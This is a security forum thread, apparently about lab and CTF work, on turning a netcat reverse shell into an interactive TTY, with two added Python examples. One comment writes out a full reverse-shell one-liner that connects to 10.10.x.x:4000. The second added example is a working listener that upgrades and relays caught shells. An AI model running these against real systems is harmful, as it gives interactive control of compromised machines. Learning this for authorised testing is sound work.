Obtaining a Fully Interactive Shell

edited October 2017 in Other

I have seen a lot of people ask about this yet there are not too many good online resources that explain it simply.

When obtaining a reverse shell with a Netcat listener, it is by default non-interactive and you cannot pass keyboard shortcuts or special characters such as tab.

It is quite simple to work around. For starters, in your shell, run python -c 'import pty;pty.spawn("/bin/bash");' to obtain a partially interactive bash shell.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. Once that is done, run the command fg to bring Netcat back to the foreground. Note you will not be able to see what you are typing in terminal after you change your stty setting. You should now have tab autocomplete as well as be able to use interactive commands such as su and nano.

If you want to see it in action, check out ippsec's YouTube videos, as he uses this exact method in quite a few of them: ippsec's channel

Arrexel
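As an added example that is not part of Arrexel's post or of any tool the thread names, the following Python (its function names and the `/bin/sh` probe are this example's own) demonstrates the two facts the recipe above rests on: a shell whose stdin is a pipe or socket fails the isatty() check that su, passwd and editors perform, while the same shell under pty.spawn passes it; and `stty raw -echo` on the local side simply clears the ECHO, ICANON and ISIG bits of the line discipline, which is why keystrokes such as ^C and tab then reach the remote pty instead of being eaten locally.

```python
#!/usr/bin/env python3
"""Added example (not from the thread): why a bare netcat shell is not
interactive and what the two fixes actually change. /bin/sh is assumed."""
import os
import pty
import subprocess
import termios
import tty

# Constructed probe: prints "tty" if the shell's stdin passes isatty().
PROBE = "[ -t 0 ] && echo tty || echo notty"


def child_sees_tty(use_pty):
    """Run PROBE in /bin/sh with stdin on a pipe (what a reverse shell over a
    socket looks like) or on a pseudo-terminal (what pty.spawn gives it)."""
    if not use_pty:
        res = subprocess.run(["/bin/sh", "-c", PROBE], input=b"", capture_output=True)
        return res.stdout.strip() == b"tty"
    pid, master = pty.fork()
    if pid == 0:                       # child: stdin/stdout/stderr are the pty slave
        os.execv("/bin/sh", ["/bin/sh", "-c", PROBE])
    out = b""
    while True:
        try:
            chunk = os.read(master, 1024)
        except OSError:                # Linux raises EIO once the child hangs up
            break
        if not chunk:                  # other Unixes return EOF instead
            break
        out += chunk
    os.waitpid(pid, 0)
    os.close(master)
    return out.strip() == b"tty"


def line_discipline(fd):
    """Which of the local flags behind `stty raw -echo` are on for fd."""
    lflag = termios.tcgetattr(fd)[3]
    return {
        "echo": bool(lflag & termios.ECHO),      # kernel echoes keystrokes
        "icanon": bool(lflag & termios.ICANON),  # line editing / line buffering
        "isig": bool(lflag & termios.ISIG),      # ^C ^Z ^\ are turned into signals
    }


def raw_mode_effect():
    """Open a fresh pty pair, record the cooked defaults, apply the equivalent
    of `stty raw -echo`, record again, restore, and return (before, after)."""
    master, slave = pty.openpty()
    try:
        before = line_discipline(slave)
        saved = termios.tcgetattr(slave)
        tty.setraw(slave)              # clears the same bits as stty raw -echo
        after = line_discipline(slave)
        termios.tcsetattr(slave, termios.TCSANOW, saved)  # what `reset` gives you back
    finally:
        os.close(slave)
        os.close(master)
    return before, after


if __name__ == "__main__":
    print("stdin on a pipe, isatty:", child_sees_tty(False))
    print("stdin on a pty,  isatty:", child_sees_tty(True))
    print("cooked -> raw:", raw_mode_effect())
```

The restore in raw_mode_effect is the programmatic form of the reset the thread recommends when you end up typing blind; a real listener should do the same in a finally block rather than rely on the operator remembering it.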


Comments

  • edited October 2017

    Nicely put. I once was looking for how to nano a file through a shell, not ssh... I finally had to echo my code into the file on the PWK labs.

    Question: does this work for all reverse shells obtained through other means like (php, perl and python) or only nc shells?

  • You won't always have python, so this is a good resource to have bookmarked:
    https://netsec.ws/?p=337

    sajkox

  • @princeade said:
    Nicely put. I once was looking for how to nano a file through a shell, not ssh... I finally had to echo my code into the file on the PWK labs.

    Question: does this work for all reverse shells obtained through other means like (php, perl and python) or only nc shells?

    The majority of connect back shells should work fine. I meant nc as the listening service on the local machine. Refer to the netsec.ws link that @sajkox posted to see other options.

    Arrexel

  • I've tried the above method a few times, but it failed every time. I don't understand what I am doing wrong...
    After doing fg, the Enter key is displayed as ^M
    Something like this:

    $ fg
                               clear^M
    


  • edited October 2017

    Have a look at ippsec's video to see it in action: Joker

    Note he did /bin/sh in pty.spawn. Should have been /bin/bash

    Arrexel

  • I do /bin/bash every time I try, too...
    I've followed all his tutorials so far and I've tried to imitate it.
    No luck so far...


  • What machine are you trying this on, what kind of reverse connection and what are you using for a listener?

    Arrexel

  • I tried this on Parrot OS which is debian based with mate DE.
    And the reverse connection was:

    mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe
    

    And listening with:

    nc -nvlp 4000
    


  • Hmm works for me with that exact connect back method in Kali. Tested on CronOS:
    cronos rev shell

    Arrexel

  • edited October 2017

    This is what's happening at my end
    image

    I got the same output when I tried with some of the HTB machines.


  • @hkh4cks it might be down to ohmyzsh I think

    sajkox

  • Great find @sajkox ! :smiley:
    That was the issue...
    Thank you guys for looking into it :)


  • @hkh4cks try pressing enter a couple times after foregrounding the process


  • Nice thread, guys. My two cents:

    stty rows 50 cols 200

    This fixes the rows/cols in your terminal. Especially useful when you do ps, so you can see the full length of the process command.

    You can also play with the TERM env variable if it is not set already, e.g. export TERM=xterm

  • @PinkPanther it worked when I switched to bash from zsh.
    Nice tip @SuRGeoNix


  • What about -e /bin/bash?

  • Hi all
    https://mukarramkhalid.com/php-python-root-exploiter/

    You can have a TTY in an HTTP shell or web-based shell by providing credentials. That is useful in case the server is dropping requests on other ports, etc.

  • Bump, as several people have been asking about this topic recently

    Arrexel

  • Hi @hkh4cks,
    how did you fix the ohmyzsh error with the netcat shell after doing fg?
    I can't find anything to fix that.

  • I came across this while trying to solve similar issues; it might help others. There are a few additional commands compared to what is listed in the first post.

    • On the remote machine, run python -c 'import pty; pty.spawn("bash")' and press CTRL-z to put the SSH session into the background.
    • Then run stty -a to print out information about your shell. Note the rows and columns (say they are 40 and 160 respectively).
    • Now run stty raw -echo to put your shell into raw mode, then fg to get back into the SSH session, and finally reset to reset the shell. If you get asked for the type of the terminal, use xterm-256color.
    • After that, run stty rows 40 columns 160 to specify the correct size. You should now have a fully working shell; in particular, vi should work.

    https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

  • edited December 2018

    That's a great thing to share, so here are my two cents:

    • Spawning bash with python:
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    
    • Backgrounding the remote shell with CTRL-Z:
    $ ^Z
    
    • Getting ROWS and COLS within the current terminal window:
    $ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
    
    • Ignoring hotkeys in the local shell and getting back to the remote:
    $ stty raw -echo; fg
    
    • Setting the correct size for the remote shell (where ROWS and COLS are the values from the 3rd bullet):
    $ stty rows ROWS cols COLS
    
    • Adding some colors:
    $ export TERM=xterm-256color
    
    • Reloading bash to apply the TERM variable:
    $ exec /bin/bash
    
    

    :triumph:


  • Great thread. Sexytime


  • You can also write a c program that spawns a child which is controlled by a pty. In this article you find information on how to do that:
    http://rachid.koucha.free.fr/tech_corner/pty_pdip.html

    If you want to read about what tty/pty are, take a look at this article:
    http://www.linusakesson.net/programming/tty/

  • Something handy for me is setting this up in the custom commands plugin for terminator.
    I have 3 commands: one to pty.spawn bash, one to print and set stty info locally, and one to set stty on the actual rev shell. They are quick and dirty one-liners, but it works pretty well. Here are my commands:

    Terminator Custom Commands

    name: Upgrade TTY Python
    Command: python -c "import pty;pty.spawn('/bin/bash')"

    name: Fix TTY 1
    command: printf "\n\n(Rows,Cols)\n ";printf '\e[1;91m%-6s\e[m' $(stty size);printf "\n\nTerm= \e[91m$TERM\e[0m\n\n";stty raw -echo;fg;

    name: Fix TTY 2
    command: export SHELL=bash;export TERM=xterm-256color;stty rows 20 columns 100;\echo ;echo ;read -p "Enter Rows:" ROWS;read -p "Enter Cols:" COLS;stty rows $ROWS columns $COLS && clear

    Once you get a reverse shell:
    1. right click > custom commands > Upgrade TTY Python
    2. Press Ctrl+z to background
    3. right click > custom commands > Fix TTY 1
    4. right click > custom commands > Fix TTY 2
    5. enter the row and col values when prompted (should still be on screen from step 2, so long as no reset is used).

  • edited March 26

    For the people (@hkh4cks) who are getting ^M and ^? instead of ENTER and BACKSPACE after running the fg command, here's the explanation of the problem and the solution.

    Probably you're using zsh as your terminal and/or macOS. The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. So if you read the stty manual and check what the command stty raw -echo was intended to do, you'll see that after running it, your output wasn't supposed to be echoed back to your screen anymore. So if you run stty -echo and are still able to see what you're typing next, your terminal is not respecting the -echo. Reading this zsh mailing list thread (https://www.zsh.org/mla/workers/2014/msg00870.html) we can see that zsh, specifically, only respects the -echo until the next prompt. That means that you need to type your next command all on one line, just like @snovvcrash showed in his comment:

    $ stty raw -echo; fg

    If you try to execute this as two separate commands, as soon as the prompt appears for you to execute the fg command, your -echo command has already lost its effect. This is not a zsh limitation, however; au contraire, this is intended behavior for your own safety. Zsh behaves like this to prevent you from getting stuck blind at a terminal. To understand what that means, just run bash and then stty -echo. Now you have no idea what you're typing anymore. You're blind, just hoping you correctly type reset to get your echo back.

    Hope this helps. Cheers!

  • @salamander said:

    For the people (@hkh4cks) who are getting ^M and ^? instead of ENTER and BACKSPACE after running the fg command, here's the explanation of the problem and the solution.

    Probably you're using zsh as your terminal and/or macOS. The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. So if you read the stty manual and check what the command stty raw -echo was intended to do, you'll see that after running it, your output wasn't supposed to be echoed back to your screen anymore. So if you run stty -echo and are still able to see what you're typing next, your terminal is not respecting the -echo. Reading this zsh mailing list thread (https://www.zsh.org/mla/workers/2014/msg00870.html) we can see that zsh, specifically, only respects the -echo until the next prompt. That means that you need to type your next command all on one line, just like @snovvcrash showed in his comment:

    $ stty raw -echo; fg

    If you try to execute this as two separate commands, as soon as the prompt appears for you to execute the fg command, your -echo command has already lost its effect. This is not a zsh limitation, however; au contraire, this is intended behavior for your own safety. Zsh behaves like this to prevent you from getting stuck blind at a terminal. To understand what that means, just run bash and then stty -echo. Now you have no idea what you're typing anymore. You're blind, just hoping you correctly type reset to get your echo back.

    Hope this helps. Cheers!

    Big man coming in clutch with this. Props.

  • After fg, ctrl+z cannot background the shell ?

  • @BaiduFu said:

    After fg, ctrl+z cannot background the shell ?

    You did it backwards. fg stands for "foreground", meaning you'll be foregrounding the job you just "backgrounded" with CTRL+Z.



  • After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't, I simply find a workaround or just deal with what I have.

  • edited July 20

    For the sake of variety: instead of doing the python -c ... thing, thus relying on python being available on the box, you could also do:

    script /dev/null. This will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+z ... etc. and export TERM=linux, export HOME=/tmp or something similar).

    HTH!

    sx02089
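Putting the recipe the thread converges on together (pty.spawn, then the local stty raw -echo, then rows/columns and TERM on the remote, with script /dev/null as the no-python fallback), here is an added example that is not code from the thread or from any of its posters: a listener that replaces nc -nvlp, sends the spawn line and the fix-ups itself, switches the local terminal to raw mode for the relay, and restores the terminal in a finally block so a failed session never leaves you typing blind. It assumes the remote is a Unix shell reading commands from the socket with /bin/bash available; the python/python3/script fallback order, the one-second pause, and all function names are this example's own choices. The terminal size is taken from the local terminal directly instead of being read off stty -a.

```python
#!/usr/bin/env python3
"""Added example, not from the thread: a listener that performs the TTY
upgrade automatically and always restores the local terminal."""
import os
import select
import socket
import sys
import termios
import threading
import time
import tty


def upgrade_commands(rows, cols, term="xterm-256color", shell="/bin/bash"):
    """Two lines for the remote side. The first spawns a pty (python, then
    python3, then `script` when there is no python at all); the second must
    only arrive once the new shell is reading, so it is sent separately."""
    spawn = (
        f"python -c 'import pty;pty.spawn(\"{shell}\")' || "
        f"python3 -c 'import pty;pty.spawn(\"{shell}\")' || "
        f"SHELL={shell} script -q /dev/null\n"
    )
    fixup = f"stty rows {rows} columns {cols}; export TERM={term} SHELL={shell}\n"
    return spawn, fixup


def _write_all(fd, data):
    while data:                              # os.write may return a short count
        data = data[os.write(fd, data):]


def relay(sock_fd, in_fd, out_fd):
    """Copy in_fd -> socket and socket -> out_fd until the remote hangs up.
    Returns (bytes_sent, bytes_received)."""
    sent = received = 0
    readers = [sock_fd, in_fd]
    while True:
        ready, _, _ = select.select(readers, [], [])
        if in_fd in ready:
            data = os.read(in_fd, 4096)
            if not data:                     # local input closed: keep draining remote
                readers.remove(in_fd)
            else:
                _write_all(sock_fd, data)
                sent += len(data)
        if sock_fd in ready:
            data = os.read(sock_fd, 4096)
            if not data:
                return sent, received
            _write_all(out_fd, data)
            received += len(data)


def serve(port):
    """Accept one reverse shell, upgrade it, then relay with the local terminal
    in raw mode, which is what `stty raw -echo; fg` achieves by hand."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    conn, _peer = srv.accept()
    srv.close()
    try:
        size = os.get_terminal_size(sys.stdout.fileno())
        rows, cols = size.lines, size.columns
    except OSError:                          # stdout is not a terminal
        rows, cols = 24, 80
    spawn, fixup = upgrade_commands(rows, cols)
    conn.sendall(spawn.encode())
    time.sleep(1)   # let pty.spawn take over stdin before the fix-ups queue up
    conn.sendall(fixup.encode())
    stdin = sys.stdin.fileno()
    saved = termios.tcgetattr(stdin)
    try:
        tty.setraw(stdin)                    # ^C, ^Z and tab now go to the remote pty
        return relay(conn.fileno(), stdin, sys.stdout.fileno())
    finally:
        termios.tcsetattr(stdin, termios.TCSADRAIN, saved)  # never leave the terminal blind
        conn.close()


def demo_loopback():
    """Offline check of relay(): a constructed fake remote on one end of a
    socketpair echoes what it gets with an 'echo:' prefix, then hangs up."""
    local, remote = socket.socketpair()
    in_r, in_w = os.pipe()
    out_r, out_w = os.pipe()

    def fake_remote():
        got = remote.recv(4096)
        remote.sendall(b"echo:" + got)
        remote.close()

    t = threading.Thread(target=fake_remote)
    t.start()
    os.write(in_w, b"id\n")
    os.close(in_w)
    sent, received = relay(local.fileno(), in_r, out_w)
    t.join()
    os.close(out_w)
    local.close()
    output = os.read(out_r, 4096)
    os.close(in_r)
    os.close(out_r)
    return sent, received, output


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 4000)
```

Run it as `python3 listener.py 4000` in place of `nc -nvlp 4000`; because the local terminal is raw for the whole session, end it with `exit` on the remote rather than ^C, and the finally block puts your terminal back regardless of how the relay ends.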
